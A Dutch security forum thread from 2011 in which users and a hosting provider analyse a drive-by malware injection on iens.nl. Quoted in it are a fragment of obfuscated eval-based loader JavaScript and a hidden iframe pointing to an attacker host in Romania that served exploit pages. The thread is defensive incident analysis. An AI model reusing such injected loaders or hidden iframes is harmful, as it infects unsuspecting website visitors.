Trojan op www.iens.nl of false positive? - Privacy en beveiliging

woensdag 13 juli 2011 11:33

Acties:

0 Henk 'm!

Topicstarter

Sinds vanochtend geeft Kaspersky Anti-Virus (zakelijke variant) een waarschuwing bij het bezoeken van

code:

1	www.iens.nl

. Er zou een iframe zijn met een trojan ('HEUR:Trojan.Script.Iframer').

Is dit een false-positive, of zien jullie ook gekke dingen op iens? Iens is toch een van de grotere Nederlandse sites... zou wat zijn als die gehackt is!

(Mijn gebruikers schreeuwen dat ze bij iens willen, maar ik houdt het nog even op slot totdat er meer duidelijk is...

)

[ Voor 0% gewijzigd door iisschots op 13-07-2011 11:38 . Reden: Mogelijk gevaarlijke sites zetten we altijd tussen code tags ]

woensdag 13 juli 2011 19:47

Acties:

0 Henk 'm!

Rolfie

Ik krijg ook een trojan melding.

Is dus iets niet goed op de site.

woensdag 13 juli 2011 20:03

Acties:

0 Henk 'm!

Burner NL

Met Avast Home krijg ik geen melding over een mogelijke trojan.

woensdag 13 juli 2011 20:40

Acties:

0 Henk 'm!

Verwijderd

NOD32 klaagt ook. Heb wat javascript uit de quarantaine gehaald en dat ziet er zo uit:

code:

q = "v";
ww = Number.MAX_VALUE;

el = document.getElementsByTagName("di" + q)[0]; // Haalt de eerste div op, hierin staat een enorme cijferreeks

try {

    if (isFinite(ww) && !isFinite(ww * 1.5))
        throw 'xtNode';

} catch (qweqwe) {

    with ({
        a : 'createTe'
    }) {

        k = document[a + qweqwe]("eval"); // oftewel document[createTextNode]("eval")

    }

}

Commentaar is van mij. Code gaat nog een stukje verder zo. Op z'n minst erg dubieus.

woensdag 13 juli 2011 20:44

Acties:

0 Henk 'm!

jopitan

It's just a fact

Krijg geen melding met Norman Security Suite, ook geen rare code op de website te zien ofzo.

woensdag 13 juli 2011 20:45

Acties:

0 Henk 'm!

hhoekstra

Van nod32 krijg ik door dat de volgende website geblokkeerd is:
** laat maar is oudere melding

Edit: deze melding krijg ik

Afbeeldingslocatie: http://screenshotuploader.com/i/TI8LwCBRlWb.png

[ Voor 104% gewijzigd door hhoekstra op 13-07-2011 20:49 ]

woensdag 13 juli 2011 20:45

Acties:

0 Henk 'm!

InFamous

excommunicado

Hier ook een melding van Mircosoft Security Essentials, 1 mogelijke dreiging gevonden. Vervolgens probeert de site bij mij in iedergeval een soort van pdf bestand te openen acrobat start op maar kan niks ontvangen omdat dit geblokkeerd word door MSE. Misschien tijd om de berheerders van de website op de hoogte te stellen.

De website probeert inderdaad een pdf bestand te openen wat besmet is. file C:\users\xxxx\appdata\local\microsoft\windows\temporary internet files\content.ie5\wryxh43r\cda0[1].pdf
De trojaan staat bekend onder de naar Win32/Pfdjsc.RF

[ Voor 27% gewijzigd door InFamous op 13-07-2011 20:48 ]

Formerly known as Ragdoll

woensdag 13 juli 2011 20:49

Acties:

0 Henk 'm!

jopitan

It's just a fact

Ah vandaar, ik heb adblocker

woensdag 13 juli 2011 20:53

Acties:

0 Henk 'm!

Verwijderd

Krijgen jullie meldingen op specifieke bestanden? Graag een (enigszins defecte) link indien mogelijk

woensdag 13 juli 2011 20:57

Acties:

0 Henk 'm!

EDIT

Jup, op een .be domein:

woensdag 13 juli 2011 20:57

Acties:

0 Henk 'm!

Verwijderd

Ik heb de unpacker even gedraaid zonder daadwerkelijk iets uit te voeren. In de uitgepakte JS wordt verwezen naar onder andere dit ip-adres 91.208.142.55, java applets op ./games/worms.jar maar zonder direct zichtbaar domein en pogingen om PDF's te openen.

Zeker malware dus.

woensdag 13 juli 2011 20:58

Acties:

0 Henk 'm!

HenkEisDS

Direct contact opnemen met iens en een mailtje sturen naar abuse@iens.nl en info@iens.nl

woensdag 13 juli 2011 21:03

Acties:

0 Henk 'm!

Sharky_NL

En als je het ip adres opzoekt komt je uit in Roemenie.

woensdag 13 juli 2011 21:12

Acties:

0 Henk 'm!

jopitan

It's just a fact

Ik weet niet hoe het met jullie zit maar ik kan helemaal niks terug vinden in de broncode van het IP 91.208.*.* of het domein naam ervan. Ik zie wel een eval(function(p,a,c,k,e,r)) erin staan maar dat lijkt me sterk dat dat hem is.

woensdag 13 juli 2011 21:18

Acties:

0 Henk 'm!

JJ Le Funk

:twk

kaspersky internet security 2012 geeft dezelfde waarschuwing als bij TS (zakelijke editie).

d:)b

woensdag 13 juli 2011 21:18

Acties:

0 Henk 'm!

wlchris

jopitan schreef op woensdag 13 juli 2011 @ 21:12:
Ik weet niet hoe het met jullie zit maar ik kan helemaal niks terug vinden in de broncode van het IP 91.208.*.* of het domein naam ervan. Ik zie wel een eval(function(p,a,c,k,e,r)) erin staan maar dat lijkt me sterk dat dat hem is.

Dat is hem, hier de raw output.

http://jsunpack.jeek.org/...6eb677dba1373c579ac345483

woensdag 13 juli 2011 21:21

Acties:

0 Henk 'm!

JJ Le Funk

:twk

op dat IP lijkt een reversed proxy te draaien

d:)b

woensdag 13 juli 2011 21:29

Acties:

0 Henk 'm!

Verwijderd

wlchris schreef op woensdag 13 juli 2011 @ 21:18:

Dat is hem, hier de raw output.

http://jsunpack.jeek.org/...6eb677dba1373c579ac345483

Correct, de hostname staat er ook achterstevoren in. Een grep had hem al gevonden. Nasty little bugger...

woensdag 13 juli 2011 21:34

Acties:

0 Henk 'm!

Verwijderd

Die link naar jsunpack geeft een ander bestand en foutmelding dan ik krijg. Deze inderdaad Iframe.B.Gen virus. Op iens.nl krijg ik JS/Kryptik.BB trojan.

Vermoedelijk door het volgen van die link is nu mijn Firefox sessionstore.js besmet en krijg ik continue meldingen van NOD32. Klikken op eigen risico dus

woensdag 13 juli 2011 21:36

Acties:

0 Henk 'm!

Verwijderd

Wil iedereen s.v.p. zijn/haar cache leegmaken en de browser herstarten? De code staat inmiddels niet meer op de homepage, dus als het goed is komen er geen nieuwe meldingen meer.

[ Voor 7% gewijzigd door Verwijderd op 13-07-2011 21:38 ]

woensdag 13 juli 2011 21:38

Acties:

0 Henk 'm!

Timv37

NOD32 nu schoon hier

woensdag 13 juli 2011 21:39

Acties:

0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 13 juli 2011 @ 21:36:
Wil iedereen s.v.p. zijn/haar cache leegmaken en de browser herstarten? De code staat inmiddels niet meer op de homepage, dus als het goed is komen er geen nieuwe meldingen meer.

Niet vergeten het daadwerkelijke lek te fixen.

woensdag 13 juli 2011 21:43

Acties:

0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 13 juli 2011 @ 21:39:

Niet vergeten het daadwerkelijke lek te fixen.

Dat laat ik over aan de developers van IENS, ik werk slechts voor hun hosting provider

woensdag 13 juli 2011 21:43

Acties:

0 Henk 'm!

Thralas

Ik hoop dat die scanners van jullie context-aware zijn. Zoniet, excuses.

De packed + obfuscated JS-code dropt een iframe:

code:

1	<iframe src="h_niet_doen_p://vawboman71.co.be/forum.php?tp=bc4453c0040c9021" width="0" height="0" style="visibility:hidden;position:absolute !important;left:-5000px !important;top:0px;"></iframe>

code:

Name:   vawboman71.co.be
Address: 91.208.142.55

inetnum:        91.208.142.0 - 91.208.142.255
netname:        SC-GAZDUIRE-WEB-SRL
descr:          Gazduire Web S.R.L.
org:            ORG-GWS1-RIPE
country:        RO

De pagina in 't iframe bevat weer obfuscated JS, welke deze obfuscated HTML/JS dropped: http://pastie.org/private/xkmrf6awcmzhdgyknjeig

Veel version detection van Acrobat/Java plugins & whatnot, maar ik zie alleen zo snel geen payload.. kijk ik eroverheen?

edit:
Misschien is dit gewoon een obfuscated tracker oid, en is de payload al weg?

[ Voor 5% gewijzigd door Thralas op 13-07-2011 21:52 ]

woensdag 13 juli 2011 22:08

Acties:

0 Henk 'm!

Verwijderd

Thralas schreef op woensdag 13 juli 2011 @ 21:43:
kijk ik eroverheen?

Yup.

Genoeg malcode te vinden. Tread with caution.

woensdag 13 juli 2011 22:15

Acties:

0 Henk 'm!

Verwijderd

Ik heb inmiddels een en ander kunnen traceren aan de hand van het tijdstip waarop er aanpassingen zijn geweest in combinatie met de logbestanden. Het lijkt er sterk op dat een paar Russische kameraden een aanval hebben uitgevoerd waarbij het kennelijk uiteindelijk is gelukt iets te uploaden en uit te voeren. Ik heb de complete log opgeslagen en opgestuurd naar IENS voor nader onderzoek.

Namens Proserve in elk geval bedankt voor het melden en helpen oplossen